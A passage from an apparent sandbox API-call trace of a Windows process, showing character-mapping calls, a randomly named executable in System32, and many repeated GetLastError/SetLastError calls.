!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2ef2ec | out: lpCharType=0x2ef2ec) returned 1 [0032.389] GetLastError () returned 0x0 [0032.389] SetLastError (dwErrCode=0x0) [0032.389] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ec, cbMultiByte=256, lpWideCharStr=0x2ef028, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.390] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.390] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eee18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.390] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef5ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8a\x0eBô$ø.", lpUsedDefaultChar=0x0) returned 256 [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.390] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ec, cbMultiByte=256, lpWideCharStr=0x2ef048, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.390] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.390] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eee38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.390] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef4ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8a\x0eBô$ø.", lpUsedDefaultChar=0x0) returned 256 [0032.390] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.390] SetLastError (dwErrCode=0x0) [0032.390] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.391] GetLastError () returned 0x0 [0032.391] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.392] SetLastError (dwErrCode=0x0) [0032.392] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.393] SetLastError (dwErrCode=0x0) [0032.393] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.394] SetLastError (dwErrCode=0x0) [0032.394] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.395] GetLastError () returned 0x0 [0032.395] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.396] SetLastError (dwErrCode=0x0) [0032.396] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.397] SetLastError (dwErrCode=0x0) [0032.397] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.398] SetLastError (dwErrCode=0x0) [0032.398] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.399] SetLastError (dwErrCode=0x0) [0032.399] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.400] SetLastError (dwErrCode=0x0) [0032.400] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) 